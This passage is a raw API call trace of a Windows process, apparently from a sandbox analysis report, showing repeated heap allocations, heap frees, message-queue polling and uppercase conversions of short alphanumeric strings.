(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.911] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.911] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.912] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.913] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.914] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.915] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.915] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.915] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.915] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.916] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.939] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.939] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.940] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.940] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.940] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.941] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.941] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.942] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.942] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.943] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.943] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0188.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.944] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.944] 